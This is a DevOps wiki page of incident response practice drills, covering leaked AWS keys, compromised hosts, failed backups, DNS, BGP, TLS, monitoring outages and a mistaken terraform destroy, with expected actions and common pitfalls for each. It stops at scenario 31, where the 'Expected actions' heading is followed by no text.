Skip to content

GrokDevOps Wiki

Scenarios

grokdatum/grokdevops

Incident Response Scenarios¶

Practice triage, containment, and resolution with these scenario drills.

60 scenarios

ir-scenario-001 — Secrets Handling 🟡¶

An engineer posts a screenshot in Slack showing a terminal session. A colleague notices an AWS access key visible in the shell history. The key belongs to a service account with S3 and EC2 permissions. CloudTrail shows the key has not been used from any unusual IP yet.

Expected actions

- Immediately rotate the exposed AWS access key via IAM console or CLI - Check CloudTrail for any unauthorized usage of the key in the last 24-48 hours - Revoke any active sessions associated with the compromised credentials - Audit the service account permissions and reduce to least privilege if over-scoped - Delete the Slack message containing the screenshot - Notify the security team and open an incident ticket - Review how the key ended up in shell history and remediate (use env vars or credential helpers)

Common pitfalls

- Delaying rotation because CloudTrail looks clean — attackers may not have acted yet - Forgetting to check for derived credentials or cached sessions - Rotating the key without updating services that depend on it, causing an outage - Not checking if the key was also committed to a git repo

ir-scenario-002 — Incident Response 🟡¶

Your SIEM alerts on a successful SSH login to a production bastion host from an IP in a country where your company has no employees. The login used a valid user account. The user is currently on PTO and unreachable. The session is still active.

Expected actions

- Kill the active SSH session immediately (who/pkill or terminate the instance) - Disable or lock the compromised user account - Capture volatile evidence before killing the session if possible (netstat, ps, last) - Check auth logs for brute-force attempts or other compromised accounts - Audit what commands were executed during the session (bash_history, auditd) - Rotate the user's SSH keys and any credentials accessible from the bastion - Check for lateral movement to other hosts from the bastion - Notify the security team and escalate per incident response plan

Common pitfalls

- Waiting for the user to respond before acting — the session is active now - Rebooting the host and destroying volatile forensic evidence - Only killing the session without checking for persistence mechanisms (cron, authorized_keys) - Forgetting to check if the attacker pivoted to internal systems

ir-scenario-003 — Incident Triage 🔴¶

A monitoring alert fires for abnormally high outbound network traffic from a web server. Investigation shows a process called "kworker2" consuming CPU and making connections to external IPs on port 443. The real kworker is a kernel thread and should not make network connections. The server handles production traffic.

Expected actions

- Isolate the host from the network (security group / firewall rule) but keep it running for forensics - Redirect production traffic to other healthy instances first - Capture process details (ps auxf, /proc//exe, /proc//cmdline, /proc//maps) - Record network connections (ss -tnp, netstat -tnp) and destination IPs - Check for persistence (crontab, systemd units, /etc/rc.local, authorized_keys, LD_PRELOAD) - Image the disk before remediation for forensic analysis - Check other servers for the same indicators of compromise - Rebuild the server from a known-good image rather than trying to clean it

Common pitfalls

- Killing the process without capturing forensic evidence first - Shutting down the server and losing memory-resident malware evidence - Trying to clean the compromised server instead of rebuilding from scratch - Not checking other servers for lateral movement - Forgetting to investigate the initial access vector

ir-scenario-004 — Backup & Restore 🟡¶

During a quarterly disaster recovery drill, the database team attempts to restore a PostgreSQL backup to the DR environment. The pg_restore command completes without errors, but the application reports missing tables and the row count is 40% lower than production. The backup job has been reporting success in monitoring for months.

Expected actions

- Compare schemas between production and restored DB (pg_dump --schema-only diff) - Check if the backup job is only backing up a subset of schemas or databases - Verify the backup schedule captures all tablespaces and databases - Check if recent schema migrations added tables not included in backup scope - Review backup job configuration for excluded patterns or filters - Verify backup retention — the latest backup may not be the one restored - Fix backup scope and run an immediate verified full backup - Schedule a follow-up restore test within one week to confirm the fix

Common pitfalls

- Trusting backup job exit codes without verifying data integrity - Not comparing row counts and schema between backup and source - Blaming the DR environment for the discrepancy before checking backup completeness - Not auditing how long the backup has been incomplete (could be months)

ir-scenario-005 — Alerting Rules 🟡¶

At 3:00 AM, PagerDuty fires 200+ alerts in 10 minutes across multiple services. Alerts include: high latency on API gateway, connection pool exhaustion on three microservices, disk space warnings on log aggregator, and certificate expiry warnings. The on-call engineer is overwhelmed.

Expected actions

- Do NOT try to fix everything at once — triage for the root cause - Look for a common upstream dependency (database, DNS, network, shared storage) - Check recent deployments or config changes in the last 1-2 hours - Mute duplicate/downstream alerts to reduce noise - Focus on the earliest alert — it often points to root cause - Check core infrastructure health (DNS, load balancers, database, network) - Escalate and pull in additional engineers if needed - Communicate status in the incident channel

Common pitfalls

- Trying to fix each alert individually instead of finding the common cause - Ignoring the earliest alert because it seems minor - Not checking for recent deployments or changes - Working alone for too long without escalating - Silencing alerts without understanding why they fired

ir-scenario-006 — DNS 🟡¶

Multiple teams report that internal services can't reach each other. External services work fine. nslookup for internal hostnames returns SERVFAIL. The CoreDNS pods in your Kubernetes cluster show CrashLoopBackOff. The issue started 15 minutes ago.

Expected actions

- Check CoreDNS pod logs for the crash reason (kubectl logs, kubectl describe) - Check if a recent ConfigMap change broke CoreDNS (review Corefile) - Check node resource pressure — CoreDNS pods may be OOMKilled - Verify upstream DNS resolvers are reachable from the cluster - As a temporary workaround, consider restarting CoreDNS or scaling up replicas - If ConfigMap was changed, roll back to the last known good version - Verify resolution works after fix with nslookup from multiple pods - Post-incident, add monitoring for CoreDNS health and Corefile validation in CI

Common pitfalls

- Restarting CoreDNS repeatedly without reading the logs - Not checking for recent ConfigMap or Corefile changes - Forgetting that CoreDNS serves cluster DNS — all service-to-service communication depends on it - Not having a cached copy of the last working Corefile for rollback

ir-scenario-007 — Kubernetes Core 🟡¶

A deployment rollout is stuck at 2/5 replicas updated. The new pods are in CrashLoopBackOff. The old pods are still serving traffic. The engineering team wants to push a fix forward, but the on-call thinks rollback is safer. There is a database migration that already ran.

Expected actions

- Check new pod logs and events to understand the crash (kubectl logs, describe) - Assess if the database migration is backward-compatible with the old code - If migration is backward-compatible, roll back the deployment (kubectl rollout undo) - If migration is NOT backward-compatible, fix forward is required — prioritize the fix - Set maxUnavailable/maxSurge to limit blast radius during the fix - Verify old pods are still healthy and serving traffic - Communicate clearly about rollback vs fix-forward decision and rationale - Post-incident, ensure DB migrations are always backward-compatible

Common pitfalls

- Rolling back without checking if the DB migration is backward-compatible - Pushing a hasty fix forward that introduces new bugs - Not realizing old pods are still serving and panicking unnecessarily - Ignoring resource limits as a possible crash cause (OOMKilled)

ir-scenario-008 — Disk Troubleshooting 🟢¶

Monitoring shows a production server at 98% disk usage. The application is starting to throw write errors. The /var/log partition is the fullest. The server runs a Java application with verbose logging enabled.

Expected actions

- Identify the largest files and directories (du -sh /var/log/*, find large files) - Check for large log files that can be truncated (not deleted while process has open handles) - Truncate the active log file rather than deleting it (> /var/log/app.log) - Check for deleted files still held open by processes (lsof +L1) - Implement log rotation if not already configured (logrotate) - Reduce Java log verbosity from DEBUG/TRACE to INFO or WARN - Set up disk space alerts at 80% and 90% thresholds - Consider moving logs to a dedicated partition or log aggregation service

Common pitfalls

- Deleting the log file with rm while the process still has it open (space not freed) - Restarting the application to free file handles during peak traffic - Only clearing space without fixing the root cause (logs will fill up again) - Not checking for other large files outside /var/log (core dumps, tmp files)

ir-scenario-009 — Load Balancing 🟡¶

Users report intermittent 502 Bad Gateway errors. The ALB health checks show 2 of 4 backend instances as unhealthy. The unhealthy instances respond normally when curled directly from a bastion host. The issue started after a security group change 30 minutes ago.

Expected actions

- Compare the current security group rules with the previous state - Check if the health check port/path is still allowed in the security group - Verify the ALB health check configuration (port, path, protocol, thresholds) - Check if the security group change removed ingress from the ALB's security group - Remember ALB health checks come from the ALB's own IPs, not the user's IP - Fix the security group to allow health check traffic from the ALB - Monitor health checks returning to healthy state - Add a change management note about LB-to-backend security group dependencies

Common pitfalls

- Assuming the instances are actually unhealthy because the LB says so - Not connecting the timing of the security group change to the incident - Only checking the instance security group without checking ALB security group - Forgetting that ALB health checks need their own ingress rules

ir-scenario-010 — Cloud Deep Dive 🔴¶

A CI/CD pipeline that deploys to S3 and invalidates CloudFront suddenly starts failing with Access Denied errors. Nothing in the pipeline or IAM role has changed. The IAM policy simulator shows the role should have access. The S3 bucket policy also allows the role. The issue affects only one of three deployment environments.

Expected actions

- Check for S3 bucket policy changes or updates - Look for Service Control Policies (SCPs) in AWS Organizations that may restrict access - Check for S3 Block Public Access settings if the bucket was recently modified - Verify there is no explicit deny in any policy (denies override allows) - Check for VPC endpoint policies if the pipeline runs in a VPC - Look for resource-based policy conditions (aws:SourceIp, aws:SourceVpc, MFA) - Check CloudTrail for the exact error details and which policy caused the deny - Compare the working environments with the broken one for policy differences

Common pitfalls

- Trusting the IAM policy simulator completely — it does not evaluate SCPs, VPC endpoint policies, or session policies - Not checking for explicit denies which override any number of allows - Overlooking S3 bucket policy conditions that restrict by IP or VPC - Not comparing the broken environment with working ones to isolate the difference

ir-scenario-011 — Database Operations 🔴¶

A junior engineer ran a DELETE query on the production database without a WHERE clause. They immediately realized the mistake and stopped the query after 8 seconds. The table had 2.4 million rows. The engineer estimates roughly 150,000 rows were deleted. The application is showing errors for some users. The last backup is 6 hours old.

Expected actions

- Assess the impact — which users/data are affected by the deleted rows - Check if the database has point-in-time recovery (PITR) enabled - If PITR is available, restore to a point just before the DELETE to a separate instance - Extract the deleted rows from the PITR restore and re-insert into production - If no PITR, restore the 6-hour-old backup to a separate instance and identify deleted rows - Reconcile the 6-hour gap using application logs, WAL, or binlog if available - Do NOT restore over the production database — merge the missing rows back - Post-incident, restrict production database write access and require WHERE clause linting

Common pitfalls

- Restoring the 6-hour-old backup directly over production (loses 6 hours of other changes) - Panicking and shutting down the application instead of assessing the actual scope - Not checking for PITR before falling back to the older backup - Not restricting production DB access immediately to prevent further mistakes - Forgetting to reconcile the gap between the backup and the incident time

ir-scenario-012 — Cli Scripting 🟢¶

A cron job that monitors disk usage runs a grep command to search for error patterns in a log file. The job exits with code 1 every time grep finds no matches, which cron interprets as failure and sends alert emails to the on-call team. The engineer on call believes cron itself is broken and escalates to the infrastructure team. The job has run daily for months with no actual errors found.

Expected actions

- Reproduce the issue manually by running the cron command interactively - Check grep's exit code behavior — exit code 1 means no match found, not an error - Inspect the cron job definition for any error handling or exit code checking - Modify the script to handle grep exit code 1 explicitly (e.g., grep ... || true) - Alternatively pipe grep output and check for absence of matches with a conditional - Verify the fix by running the modified script and confirming exit code 0 - Update cron monitoring to alert only on exit code 2 (grep error) not exit code 1 - Add a comment in the script explaining the grep exit code semantics

Common pitfalls

- Assuming non-zero exit code always means something is broken - Changing the cron schedule or moving to a different tool without fixing the root cause - Adding excessive error suppression (2>/dev/null) that hides real grep errors - Not testing the fix before deploying to production

ir-scenario-013 — Cli Scripting 🟡¶

A deployment script works perfectly on the engineer's MacBook and in the staging environment but fails in production with cryptic errors: unrecognized conditional syntax, array declarations not recognized, and RANDOM variable producing literal text. The production server is a minimal Linux install. The script shebang line says #!/bin/sh. Operations confirms the script has not changed since staging passed.

Expected actions

- Check which shell is actually executing the script on the production server - Identify that /bin/sh on many Linux systems is dash, not bash - Audit the script for bash-specific syntax — double brackets [[ ]], arrays, $RANDOM, process substitution <() - Either change shebang to - Or rewrite offending constructs to POSIX sh equivalents ([ ] for tests, loops for arrays) - Test the fixed script with dash explicitly on the local machine (dash ./script.sh) - Add a shellcheck lint step to CI to catch portability issues before deployment - Document which shell the deployment environment uses in the runbook

Common pitfalls

- Assuming /bin/sh is bash because it is on macOS and some distros - Installing bash on the production server without checking if that is allowed - Only fixing the immediate error and not auditing the entire script for other bash-isms - Not adding a CI check that will catch the same issue on future changes

ir-scenario-014 — Cli Scripting 🟡¶

A data processing pipeline uses jq to transform a JSON stream of API responses written one object per line. The pipeline runs silently and produces an empty output file. When run manually with a small sample file it works correctly. A check of the input data reveals one line among thousands contains a truncated JSON object due to a network timeout during collection. The pipeline is scheduled to run hourly and has been producing zero-byte output for the past three hours.

Expected actions

- Confirm the output file is truly empty and not a symlink or wrong path - Run jq with the --exit-status flag to surface errors on invalid input - Pipe the input through jq -e . to identify the malformed line number - Use grep -n to find the malformed line in the input for inspection - Fix the pipeline to skip malformed lines using jq with error handling (try-catch or --raw-input) - Add input validation before processing (jsonschema check or jq empty test) - Set up output size alerting so empty output files trigger a warning - Fix the data collection step to handle network timeouts and write complete JSON only

Common pitfalls

- Assuming the pipeline succeeded because it exited 0 (jq exits 0 even when it skips all input) - Deleting the malformed input file before capturing the bad line for root cause analysis - Silently skipping all errors without logging which lines were dropped - Not fixing the upstream collection bug that created malformed records

ir-scenario-015 — Cli Scripting 🔴¶

A sysadmin runs find . -name "*.log" -exec rm {} \; from what they believe is /var/app/logs but the terminal was left in /var by accident. The command is actively deleting files. The admin sees output scrolling and recognizes the paths are wrong — system log files are being removed. The system is a production web server currently serving traffic.

Expected actions

- Immediately kill the find process with Ctrl+C or kill the PID from another terminal - Run ps aux | grep find to confirm the process is dead - Assess which files were deleted by checking recent entries in the auth log, syslog, and app logs before the deletion started - Check if the application is still serving requests — it may be buffering logs in memory - Identify the backup strategy and locate the most recent backup of /var/log - Do NOT restart the application or syslog daemon yet — running processes may still have open file handles to deleted files (lsof +L1) - Restore critical log files from backup to a recovery directory, then move to /var/log - Restart log daemons and verify logging resumes correctly - Write an incident report documenting exactly which files were deleted and recovery steps

Common pitfalls

- Panicking and rebooting the server, losing any chance to recover file handles - Restarting the application immediately without checking open file handles - Restoring from backup without verifying the backup is complete - Not documenting the exact scope of deletion before starting recovery - Running ls -la after deletion and assuming the empty directory means total data loss

ir-scenario-016 — Cli Scripting 🟡¶

An awk script processes a report file and sums values in the third column. The totals are consistently wrong by a small amount. The script has been in use for a year. A colleague notices that some rows in the report have consecutive spaces between fields because the report generator right-aligns numbers. The awk script uses FS=" " (a single literal space) in the BEGIN block. The colleague insists the default FS behavior should handle this but the engineer disagrees.

Expected actions

- Reproduce the mismatch with a minimal test file containing consecutive spaces - Understand the difference — FS=" " (single space) is a literal single-space separator creating empty fields; FS=" " (default) trims leading/trailing whitespace and splits on any whitespace run - Inspect the BEGIN block of the awk script to confirm FS=" " is set as a literal space - Either remove the explicit FS assignment to use awk's default whitespace splitting - Or change the assignment to use a regex that matches one or more spaces — FS="[[:space:]]+" - Validate the fix against multiple rows including edge cases (leading spaces, trailing spaces) - Run a diff of the output before and after the fix against a known-correct total - Update the script comment to explain the field separator choice explicitly

Common pitfalls

- Assuming FS=" " and default whitespace splitting behave the same way - Preprocessing the file with sed to normalize spacing instead of fixing the awk script - Only testing the fix on rows without consecutive spaces and missing the edge case - Using cut instead of awk to work around the issue without understanding the root cause

ir-scenario-017 — Datacenter Ops 🔴¶

A newly racked server fails to POST after powering on. The monitor shows no video signal. The front panel power LED is solid amber. BMC remote access via iDRAC is reachable and shows POST error codes in the event log. The server was transferred from another datacenter and the memory was reseated during shipping prep. Surrounding servers in the rack are healthy.

Expected actions

- Connect to iDRAC/BMC web interface and read the system event log for POST error codes - Identify the error category — memory, CPU, PCIe, power, or hardware fault - Use the server vendor's POST code reference to decode the specific fault - Physically inspect the memory DIMMs — check seating, correct slot population per the manual, and mix of DIMMs - Reseat the DIMMs one at a time, powering on after each change to isolate the faulty module - If POST still fails, check CPU socket for bent pins (if accessible) and PCIe card seating - Connect a serial console cable and capture full POST output for detailed diagnostics - If a failed DIMM is identified, swap with a known-good spare and re-POST - Open a hardware support ticket with the vendor if no obvious physical cause is found

Common pitfalls

- Replacing components without reading the POST codes first - Ignoring the event log and assuming the problem is software or configuration - Not following the memory population rules in the hardware manual (wrong slot order) - Swapping too many components at once making it impossible to identify which was faulty - Forgetting that amber power LED specifically indicates a hardware or POST fault, not a power supply issue

ir-scenario-018 — Datacenter Ops 🟡¶

A production storage array reports a RAID-5 array as degraded after one drive failed. The array controller automatically started a rebuild using a hot spare. Twelve hours into the rebuild, I/O throughput across the array has dropped 40% and latency has increased. Applications are slow but still running. The business wants a recovery timeline. Operations wants to speed up the rebuild but is worried about stressing the array further during production hours.

Expected actions

- Check the array controller UI for rebuild progress percentage and estimated completion time - Review array controller logs for any additional drive errors or reallocated sectors - Assess application health — determine if the 40% throughput drop is within tolerable bounds or approaching SLA breach - Do NOT add additional I/O load during the rebuild (avoid large backups, batch jobs, or reindexing) - Check if rebuild priority is configurable — some controllers allow throttling to balance rebuild speed vs production I/O - Monitor all remaining drives in the array for SMART errors — a second failure during rebuild means data loss - Communicate a realistic ETA to the business based on rebuild progress rate - After rebuild completes, verify array status shows all drives healthy and no errors - Post-incident, evaluate moving to RAID-6 or increasing spare count for additional fault tolerance

Common pitfalls

- Increasing rebuild priority to maximum during peak production hours without impact assessment - Ignoring SMART errors on other drives in the array during the rebuild window - Restarting applications or the storage controller to clear performance alerts - Telling the business the array is healthy before rebuild completes - Not checking whether the hot spare is of sufficient size and speed to replace the failed drive

ir-scenario-019 — Datacenter Ops 🟡¶

PXE network boot works reliably for new servers in the lab but fails in the production rack. The server gets a DHCP offer and ACK from the network, downloads the bootloader filename from DHCP option 67, then times out trying to fetch the kernel image. Lab servers are older hardware; production servers are a newer generation. DHCP and TFTP servers are unchanged. The network team confirms no firewall changes were made.

Expected actions

- Check whether the production server is booting in UEFI or Legacy BIOS mode - Confirm whether the lab server uses Legacy BIOS and the production server uses UEFI - Inspect the DHCP server configuration for option 67 — BIOS PXE expects pxelinux.0 while UEFI expects a .efi bootloader - Check if the DHCP server is configured to send different bootloader filenames based on the client architecture (DHCP option 93) - On the DHCP server, add or fix architecture-specific bootloader options for UEFI clients - Verify the UEFI bootloader file exists in the TFTP root directory - Test PXE boot after the DHCP fix and confirm the kernel loads - Document BIOS/UEFI differentiation requirements in the PXE setup runbook

Common pitfalls

- Assuming TFTP is failing when the real issue is the wrong bootloader filename being served - Disabling UEFI Secure Boot to work around the issue without fixing the PXE config - Replacing network cables or switches before checking boot mode compatibility - Not testing the fix on multiple units of the new hardware before deploying broadly - Forgetting to update the PXE config for UEFI clients when existing infrastructure was BIOS-only

ir-scenario-020 — Datacenter Ops 🔴¶

At 2 AM a temperature alert fires for a server room zone. Multiple servers in one section of the room report thermal throttling via IPMI sensor data. A top-of-rack switch in the same zone is also logging high-temperature warnings. Physical inspection shows a CRAC unit indicator light is amber and not blowing cold air. Other CRAC units in the room are running normally. Some cable bundles in the hot rack run horizontally across the front of the servers blocking intake airflow.

Expected actions

- Confirm the scope immediately — check temperature sensors across all racks to identify which are affected - Identify the faulty CRAC unit and alert the facilities or data center operations team - Redistribute load if possible — increase setpoint or fan speed on adjacent CRAC units - Physically remove or reposition cable bundles blocking server intake airflow in the affected rack - Monitor server inlet temperatures via IPMI every 5 minutes to track improvement or worsening - If temperatures continue to rise, begin graceful shutdown of lowest-priority servers in the hot zone - Contact the CRAC vendor's emergency maintenance line if the unit cannot be reset remotely - Keep the on-call manager and application owners informed of status and risk of forced shutdown - Document the timeline and corrective actions for the post-incident review

Common pitfalls

- Assuming a single failing sensor is a false alarm without physically verifying conditions - Waiting for facilities to respond before taking interim cooling steps (cable management, adjacent CRAC load shift) - Restarting throttled servers without first reducing temperature — they will throttle again immediately - Not monitoring the switch temperature separately — switches often fail before servers in heat events - Closing the incident once temperature drops without fixing the cable management that blocked airflow

ir-scenario-021 — Datacenter Ops 🟡¶

An alert fires showing a UPS in the server room is at 85% load capacity after a new high-density server was installed. The UPS is rated for 20 kVA. Current load is 17 kVA. The new server draws 2.8 kW. The rack has two PDUs fed from different circuit breakers but both are connected to the same UPS. A second UPS in the room is at 40% load. The battery runtime on the overloaded UPS has dropped to 4 minutes at current draw.

Expected actions

- Confirm the UPS load reading is accurate via the UPS management interface - Identify which PDU the new server is plugged into and confirm its current draw - Check if the new server has dual PSUs that can be split across PDUs on different UPS units - Connect one PSU of the new server to a PDU fed by the second, underloaded UPS - Verify load on both UPS units after the move and confirm each is below 75% capacity - Check remaining battery runtime on the previously overloaded UPS after load reduction - Review all other servers in the rack for dual PSU opportunities to improve load balance - Update the rack power documentation to reflect the new load distribution - Set UPS load alerting thresholds at 70% and 80% for earlier warning on future additions

Common pitfalls

- Moving the entire server's power to the second UPS instead of splitting dual PSUs across both - Assuming the load alert is a monitoring glitch and not physically verifying the UPS - Not checking battery runtime — a 4-minute runtime is critically short for a graceful shutdown - Reconfiguring power without updating the rack power documentation - Ignoring the risk that the overloaded UPS could trip a breaker protecting other servers in the rack

ir-scenario-022 — Prometheus 🟡¶

After a network policy change in Kubernetes, all Prometheus scrape targets show as DOWN in the Targets page. The services are actually running fine and passing health checks. Application logs show normal request handling. The metrics path on port 9090 is blocked by the new network policy but the health check port 8080 is still allowed. Teams are panicking because dashboards are empty and they believe all services are down.

Expected actions

- Check Prometheus Targets page for the specific scrape error (connection refused vs timeout) - Verify the services are healthy by hitting their health check endpoints directly - Review the recently applied network policy to identify which ports and paths it affects - Compare the network policy ingress rules against the Prometheus scrape port and path - Update the network policy to allow ingress from the Prometheus pod CIDR on the metrics port - Verify scrape targets return to UP after the network policy fix - Communicate to teams that services were never down — only metrics collection was blocked - Add a CI check or policy validation that ensures metrics ports are included in network policies

Common pitfalls

- Assuming services are actually down because Prometheus says targets are DOWN - Rolling back the entire network policy instead of surgically allowing the metrics port - Not distinguishing between health check ports and metrics scrape ports in the policy - Restarting services or pods unnecessarily because dashboards show no data

ir-scenario-023 — Grafana 🔴¶

During a real production incident, the Grafana dashboard shows flat-line zeros for all metrics. Engineers cannot see error rates, latency, or throughput. The root cause is that Prometheus ran out of disk space and its WAL is corrupted, so it stopped ingesting new samples. However, the Prometheus /metrics endpoint still returns HTTP 200 OK and its own up metric reads 1. No alerts are firing because Prometheus alerting rule evaluation also stopped when ingestion failed. The team is flying blind during an active incident.

Expected actions

- Check Prometheus pod logs for WAL corruption or disk space errors - Verify Prometheus disk usage with df or kubectl exec into the pod - Check the Prometheus TSDB status page (/api/v1/status/tsdb) for head block errors - Expand the Prometheus PVC or clean old data to free disk space - Restart Prometheus after freeing space to trigger WAL repair - Use alternative data sources (application logs, kubectl top, cloud provider metrics) during the blind window - After recovery, verify alerting rules are evaluating again by checking /api/v1/rules - Add a meta-alert on prometheus_tsdb_head_samples_appended_total dropping to zero

Common pitfalls

- Trusting that Prometheus is healthy because its /metrics endpoint returns 200 OK - Not realizing that alert evaluation stops when ingestion stops — the absence of alerts is itself the problem - Spending time debugging Grafana datasource configuration when the issue is Prometheus storage - Not having an out-of-band monitoring system that watches Prometheus itself

ir-scenario-024 — Loki 🔴¶

Loki log ingestion drops from 50,000 lines per second to zero after a new microservice deployment. Promtail agents are still running and shipping logs, but Loki is rejecting all writes with HTTP 429 "too many streams" errors. Investigation reveals the new deployment added request_id as a Loki label. With millions of unique request IDs, the label cardinality exploded and exceeded Loki's per-tenant stream limit. Existing services' logs are also being rejected because the stream limit is tenant-wide.

Expected actions

- Check Loki ingester logs for "too many active streams" or "per-tenant series limit" errors - Identify which label is causing the cardinality explosion by querying Loki's /api/v1/series endpoint - Roll back or fix the new deployment's Promtail/logging configuration to remove request_id as a label - Move request_id from a label to a structured log field (parsed at query time, not indexed) - Temporarily increase the per-tenant stream limit to restore ingestion for other services - After fixing the label, wait for old high-cardinality streams to expire (based on retention) - Add a CI check or admission webhook that rejects logging configs with known high-cardinality labels - Document the label cardinality policy and which fields are allowed as labels vs structured fields

Common pitfalls

- Increasing stream limits without fixing the cardinality issue — this just delays the problem - Not realizing the blast radius is tenant-wide — all services lose logs, not just the offending one - Blaming Loki performance instead of investigating the label cardinality change - Restarting Loki ingesters, which causes them to replay the WAL and hit the same limits again

ir-scenario-025 — Tracing 🟡¶

Tempo traces show a 100% error rate for a critical payment service, but application logs show no errors and the service is processing payments successfully. After a recent deployment, the OpenTelemetry SDK was misconfigured with the service name "payment-service-v2" instead of "payment-service". All new traces are being attributed to a non-existent service. The old service name shows no recent traces, making it look like the service stopped entirely. Alerts based on trace error rates are firing.

Expected actions

- Query Tempo for traces with the new service name to confirm they exist and are healthy - Compare the service name in the OpenTelemetry SDK configuration against the expected name - Check the deployment manifests or environment variables for the OTEL_SERVICE_NAME setting - Fix the service name in the configuration and redeploy - Update dashboards and alerts to be resilient to service name changes or add service name validation - Verify traces appear under the correct service name after the fix - Suppress the false-positive error rate alerts with an annotation explaining the root cause - Add a CI check that validates OTEL_SERVICE_NAME against an allowed service registry

Common pitfalls

- Assuming the service is actually failing because traces show errors - Investigating application code for bugs when the issue is SDK configuration - Not checking traces under alternative service names in Tempo - Rolling back the deployment unnecessarily when only the tracing config needs fixing

ir-scenario-026 — Alerting Rules 🟡¶

A Prometheus alerting rule for PodCPUThrottled with severity=warning fires over 200 times per day. The on-call team muted it months ago because it was too noisy to act on. A real CPU bottleneck develops in a critical service causing request timeouts and degraded user experience. The alert fires but is permanently silenced in Alertmanager. The incident goes undetected for 6 hours until users report slowness. Investigation reveals the silenced alert had been firing for the affected service the entire time.

Expected actions

- Immediately triage the active CPU bottleneck — check resource usage, scale up, or increase CPU limits - Remove the blanket silence on PodCPUThrottled and replace with targeted suppressions - Tune the alerting rule to reduce noise — increase the threshold, add a for duration, or filter by namespace - Split the alert into warning (broad, lower urgency) and critical (narrow, pages on-call) tiers - Add a meta-alert that fires when any alert has been silenced for more than 7 days - Review all other silenced alerts in Alertmanager for similar risks - Establish a policy that silences must have an expiry and a linked ticket for the tuning work - Post-incident, calculate the cost of the 6-hour detection gap and use it to justify alert hygiene

Common pitfalls

- Simply un-muting the noisy alert without tuning it — the team will mute it again - Deleting the alerting rule instead of fixing the threshold and conditions - Not checking for other silenced alerts that may be hiding real problems - Blaming the on-call team for muting instead of fixing the systemic alert quality issue

ir-scenario-027 — Bgp 🔴¶

The BGP session between two core routers keeps flapping every 3 to 5 minutes. The BGP hold timer is set to 90 seconds and keepalives are sent every 30 seconds. The management interface on one router is congested because a monitoring system is polling SNMP MIBs aggressively, delaying BGP keepalive packets beyond the hold timer threshold. Each time the session drops, the route table oscillates, causing intermittent packet loss across the entire /16 subnet. Dozens of services experience brief outages every few minutes.

Expected actions

- Identify the flapping BGP session from router logs or monitoring (show bgp summary) - Check BGP neighbor state transitions and hold timer expiry events in the router log - Investigate why keepalives are being delayed — check the management interface utilization - Identify the SNMP polling traffic saturating the management plane and reduce poll frequency - Separate BGP session traffic from management traffic using a dedicated interface or loopback - Consider increasing the BGP hold timer temporarily to stop the flapping while root-causing - Verify route table stability after the fix by monitoring BGP update counts - Add monitoring for management interface utilization and BGP session flap rate

Common pitfalls

- Increasing hold timers as a permanent fix without addressing the management plane congestion - Restarting the BGP process, which causes a full route withdrawal and reconvergence - Not correlating the flapping interval with the hold timer value to identify the timing issue - Overlooking that management plane congestion affects control plane protocols like BGP

ir-scenario-028 — STP / Spanning Tree 🔴¶

A new switch was added to the datacenter network and within 30 seconds the entire VLAN went down. STP (Spanning Tree Protocol) was disabled on the new switch because the vendor shipped it with STP off by default. The switch created a Layer 2 loop causing a broadcast storm. All other switches on the VLAN see their CPU spike to 100% processing broadcast frames. Management access to the switches is lost because the management VLAN shares the same broadcast domain. Physical access to the datacenter requires a 20-minute drive.

Expected actions

- Immediately identify the last change — correlate the VLAN outage with the new switch installation - If remote access is lost, physically disconnect the new switch's uplink cables as the fastest fix - If any remote access remains, shut the ports connecting to the new switch from the upstream switch - Once the loop is broken, verify VLAN traffic and switch CPU levels return to normal - Enable STP (RSTP or MSTP) on the new switch before reconnecting it - Enable BPDU Guard and Root Guard on all access ports to prevent future rogue switches - Configure storm control thresholds on all switch ports to limit broadcast traffic - Add a pre-deployment checklist that verifies STP is enabled before connecting any new switch

Common pitfalls

- Rebooting other switches on the VLAN which will not fix the loop and causes further disruption - Not physically disconnecting the offending switch if remote access is already lost - Re-enabling STP on the new switch while it is still connected, which may cause temporary reconvergence issues - Assuming the broadcast storm is a DDoS attack and engaging the security team instead of checking L2

ir-scenario-029 — TLS & PKI 🟡¶

At 2 AM Saturday, internal service-to-service HTTPS calls start failing with TLS handshake errors. The wildcard certificate for .internal.company.com expired 2 hours ago. The cert was manually installed on a load balancer 13 months ago and was never added to cert-manager or any automated renewal system. Monitoring did not alert because the certificate expiry check only runs against the public-facing domain .company.com, not the internal wildcard. Dozens of internal microservices cannot communicate.

Expected actions

- Confirm the root cause by checking the certificate expiry date on the load balancer (openssl s_client) - Issue an emergency replacement certificate — use an internal CA or request an expedited cert - Install the new certificate on the load balancer and reload the TLS configuration - Verify service-to-service calls resume by checking application health endpoints - Add the internal wildcard domain to the certificate monitoring system immediately - Migrate the certificate to cert-manager or an automated renewal pipeline - Audit all other manually installed certificates for similar expiry blind spots - Set up alerts at 30-day, 14-day, and 3-day expiry thresholds for all certificates

Common pitfalls

- Trying to renew through the original manual process at 2 AM when the issuing portal may be unavailable - Disabling TLS verification on services as a workaround, which creates a security vulnerability - Only fixing the expired cert without auditing other manually managed certificates - Not adding internal domains to monitoring — the same blind spot will recur with the next internal cert

ir-scenario-030 — Cloud Deep Dive 🔴¶

AWS API calls from an application start returning 503 Service Unavailable with a ThrottlingException error. The application's retry logic uses aggressive exponential backoff starting at 100ms with no jitter, causing synchronized retry storms that make the throttling worse. Other applications sharing the same AWS account also begin failing because they share the account-level API rate limits. The blast radius expands from one service to the entire account within minutes.

Expected actions

- Identify which AWS API calls are being throttled from CloudTrail or application logs - Reduce the call rate on the offending application immediately — disable non-critical features or batch requests - Add jitter to the retry logic to break the synchronized retry storm pattern - Implement exponential backoff with full jitter as per AWS best practices - Request a rate limit increase from AWS support for the specific API if the baseline rate is too low - Separate high-volume API callers into dedicated AWS accounts to isolate rate limits - Add client-side rate limiting or token bucket throttling before calls hit the AWS API - Monitor API throttling metrics (AWS/Usage namespace) and alert before hitting limits

Common pitfalls

- Retrying aggressively without jitter, which amplifies the thundering herd problem - Not realizing that API rate limits are shared at the account level across all applications - Only fixing the one application without addressing the shared-account blast radius - Requesting a rate limit increase without first optimizing the call pattern

ir-scenario-031 — Terraform 🔴¶

A Terraform apply deleted a production RDS instance with 2 TB of customer data. An engineer ran terraform destroy on what they believed was the dev workspace but was actually the prod workspace. The Terraform state file confirmed the target was production. The RDS instance had deletion protection disabled because it was marked as "temporary" six months ago and never re-protected. Automated backups have a 7-day retention but the most recent snapshot is 18 hours old.

Expected actions

